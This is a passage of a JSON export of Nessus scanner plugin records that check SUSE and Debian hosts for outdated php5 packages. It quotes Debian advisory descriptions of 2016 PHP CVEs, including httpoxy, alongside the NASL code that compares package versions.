reference:\"php5-suhosin-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-78.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:30:46", "description": "CVE-2016-5385 PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an 'httpoxy' issue.\n\nCVE-2016-7124 ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.\n\nCVE-2016-7128 The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.\n\nCVE-2016-7129 The php_wddx_process_data function in ext/wddx/wddx.c in PHP before 5.6.25 and 7.x before 7.0.10 allows remote attackers to cause a denial of service (segmentation fault) or possibly have unspecified other impact via an invalid ISO 8601 time value, as demonstrated by a wddx_deserialize call that mishandles a dateTime element in a wddxPacket XML document.\n\nCVE-2016-7130 The php_wddx_pop_element function in ext/wddx/wddx.c in PHP before 5.6.25 and 7.x before 7.0.10 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly have unspecified other impact via an invalid base64 binary value, as demonstrated by a wddx_deserialize call that mishandles a binary element in a wddxPacket XML document.\n\nCVE-2016-7131 ext/wddx/wddx.c in PHP before 5.6.25 and 7.x before 7.0.10 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly have unspecified other impact via a malformed wddxPacket XML document that is mishandled in a wddx_deserialize call, as demonstrated by a tag that lacks a < (less than) character.\n\nCVE-2016-7132 ext/wddx/wddx.c in PHP before 5.6.25 and 7.x before 7.0.10 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly have unspecified other impact via an invalid wddxPacket XML document that is mishandled in a wddx_deserialize call, as demonstrated by a stray element inside a boolean element, leading to incorrect pop processing.\n\nCVE-2016-7411 ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.\n\nCVE-2016-7412 ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.\n\nCVE-2016-7413 Use-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call.\n\nCVE-2016-7414 The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.\n\nCVE-2016-7416 ext/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument.\n\nCVE-2016-7417 ext/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data.\n\nCVE-2016-7418 The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 5.4.45-0+deb7u6.\n\nWe recommend that you upgrade your php5 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-20T00:00:00", "type": "nessus", "title": "Debian DLA-749-1 : php5 security update (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5385", "CVE-2016-7124", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libapache2-mod-php5", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter", "p-cpe:/a:debian:debian_linux:libphp5-embed", "p-cpe:/a:debian:debian_linux:php-pear", "p-cpe:/a:debian:debian_linux:php5", "p-cpe:/a:debian:debian_linux:php5-cgi", "p-cpe:/a:debian:debian_linux:php5-cli", "p-cpe:/a:debian:debian_linux:php5-common", "p-cpe:/a:debian:debian_linux:php5-curl", "p-cpe:/a:debian:debian_linux:php5-dbg", "p-cpe:/a:debian:debian_linux:php5-dev", "p-cpe:/a:debian:debian_linux:php5-enchant", "p-cpe:/a:debian:debian_linux:php5-fpm", "p-cpe:/a:debian:debian_linux:php5-gd", "p-cpe:/a:debian:debian_linux:php5-gmp", "p-cpe:/a:debian:debian_linux:php5-imap", "p-cpe:/a:debian:debian_linux:php5-interbase", "p-cpe:/a:debian:debian_linux:php5-intl", "p-cpe:/a:debian:debian_linux:php5-ldap", "p-cpe:/a:debian:debian_linux:php5-mcrypt", "p-cpe:/a:debian:debian_linux:php5-mysql", "p-cpe:/a:debian:debian_linux:php5-mysqlnd", "p-cpe:/a:debian:debian_linux:php5-odbc", "p-cpe:/a:debian:debian_linux:php5-pgsql", "p-cpe:/a:debian:debian_linux:php5-pspell", "p-cpe:/a:debian:debian_linux:php5-recode", "p-cpe:/a:debian:debian_linux:php5-snmp", "p-cpe:/a:debian:debian_linux:php5-sqlite", "p-cpe:/a:debian:debian_linux:php5-sybase", "p-cpe:/a:debian:debian_linux:php5-tidy", "p-cpe:/a:debian:debian_linux:php5-xmlrpc", "p-cpe:/a:debian:debian_linux:php5-xsl", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-749.NASL", "href": "https://www.tenable.com/plugins/nessus/96010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-749-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96010);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5385\", \"CVE-2016-7124\", \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"Debian DLA-749-1 : php5 security update (httpoxy)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-5385 PHP through 7.0.8 does not attempt to address RFC 3875\nsection 4.1.18 namespace conflicts and therefore does not protect\napplications from the presence of untrusted client data in the\nHTTP_PROXY environment variable, which might allow remote attackers to\nredirect an application's outbound HTTP traffic to an arbitrary proxy\nserver via a crafted Proxy header in an HTTP request, as demonstrated\nby (1) an application that makes a getenv('HTTP_PROXY') call or (2) a\nCGI configuration of PHP, aka an 'httpoxy' issue.\n\nCVE-2016-7124 ext/standard/var_unserializer.c in PHP before 5.6.25 and\n7.x before 7.0.10 mishandles certain invalid objects, which allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via crafted serialized data that leads to a\n(1) __destruct call or (2) magic method call.\n\nCVE-2016-7128 The exif_process_IFD_in_TIFF function in ext/exif/exif.c\nin PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a\nthumbnail offset that exceeds the file size, which allows remote\nattackers to obtain sensitive information from process memory via a\ncrafted TIFF image.\n\nCVE-2016-7129 The php_wddx_process_data function in ext/wddx/wddx.c in\nPHP before 5.6.25 and 7.x before 7.0.10 allows remote attackers to\ncause a denial of service (segmentation fault) or possibly have\nunspecified other impact via an invalid ISO 8601 time value, as\ndemonstrated by a wddx_deserialize call that mishandles a dateTime\nelement in a wddxPacket XML document.\n\nCVE-2016-7130 The php_wddx_pop_element function in ext/wddx/wddx.c in\nPHP before 5.6.25 and 7.x before 7.0.10 allows remote attackers to\ncause a denial of service (NULL pointer dereference and application\ncrash) or possibly have unspecified other impact via an invalid base64\nbinary value, as demonstrated by a wddx_deserialize call that\nmishandles a binary element in a wddxPacket XML document.\n\nCVE-2016-7131 ext/wddx/wddx.c in PHP before 5.6.25 and 7.x before\n7.0.10 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly have\nunspecified other impact via a malformed wddxPacket XML document that\nis mishandled in a wddx_deserialize call, as demonstrated by a tag\nthat lacks a < (less than) character.\n\nCVE-2016-7132 ext/wddx/wddx.c in PHP before 5.6.25 and 7.x before\n7.0.10 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly have\nunspecified other impact via an invalid wddxPacket XML document that\nis mishandled in a wddx_deserialize call, as demonstrated by a stray\nelement inside a boolean element, leading to incorrect pop processing.\n\nCVE-2016-7411 ext/standard/var_unserializer.re in PHP before 5.6.26\nmishandles object-deserialization failures, which allows remote\nattackers to cause a denial of service (memory corruption) or possibly\nhave unspecified other impact via an unserialize call that references\na partially constructed object.\n\nCVE-2016-7412 ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\nand 7.x before 7.0.11 does not verify that a BIT field has the\nUNSIGNED_FLAG flag, which allows remote MySQL servers to cause a\ndenial of service (heap-based buffer overflow) or possibly have\nunspecified other impact via crafted field metadata.\n\nCVE-2016-7413 Use-after-free vulnerability in the wddx_stack_destroy\nfunction in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11\nallows remote attackers to cause a denial of service or possibly have\nunspecified other impact via a wddxPacket XML document that lacks an\nend-tag for a recordset field element, leading to mishandling in a\nwddx_deserialize call.\n\nCVE-2016-7414 The ZIP signature-verification feature in PHP before\n5.6.26 and 7.x before 7.0.11 does not ensure that the\nuncompressed_filesize field is large enough, which allows remote\nattackers to cause a denial of service (out-of-bounds memory access)\nor possibly have unspecified other impact via a crafted PHAR archive,\nrelated to ext/phar/util.c and ext/phar/zip.c.\n\nCVE-2016-7416 ext/intl/msgformat/msgformat_format.c in PHP before\n5.6.26 and 7.x before 7.0.11 does not properly restrict the locale\nlength provided to the Locale class in the ICU library, which allows\nremote attackers to cause a denial of service (application crash) or\npossibly have unspecified other impact via a\nMessageFormatter::formatMessage call with a long first argument.\n\nCVE-2016-7417 ext/spl/spl_array.c in PHP before 5.6.26 and 7.x before\n7.0.11 proceeds with SplArray unserialization without validating a\nreturn value and data type, which allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via\ncrafted serialized data.\n\nCVE-2016-7418 The php_wddx_push_element function in ext/wddx/wddx.c in\nPHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to\ncause a denial of service (invalid pointer access and out-of-bounds\nread) or possibly have unspecified other impact via an incorrect\nboolean element in a wddxPacket XML document, leading to mishandling\nin a wddx_deserialize call.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n5.4.45-0+deb7u6.\n\nWe recommend that you upgrade your php5 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/12/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libphp5-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-interbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.45-0+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.45-0+deb7u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:56", "description": "Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream version 5.6.26, which includes additional bug fixes. Please refer to the upstream changelog for more information :\n\n - https://php.net/ChangeLog-5.php#5.6.25\n - https://php.net/ChangeLog-5.php#5.6.26", "cvss3": {}, "published": "2016-10-10T00:00:00", "type": "nessus", "title": "Debian DSA-3689-1 : php5 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3689.NASL", "href": "https://www.tenable.com/plugins/nessus/93914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3689. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93914);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7126\", \"CVE-2016-7127\", \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"DSA\", value:\"3689\");\n\n script_name(english:\"Debian DSA-3689-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.26, which includes additional bug fixes. Please refer to\nthe upstream changelog for more information :\n\n - https://php.net/ChangeLog-5.php#5.6.25\n - https://php.net/ChangeLog-5.php#5.6.26\"\n );\n # https://php.net/ChangeLog-5.php#5.6.25\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secure.php.net/ChangeLog-5.php#5.6.25\"\n );\n # https://php.net/ChangeLog-5.php#5.6.26\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secure.php.net/ChangeLog-5.php#5.6.26\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3689\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 5.6.26+dfsg-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 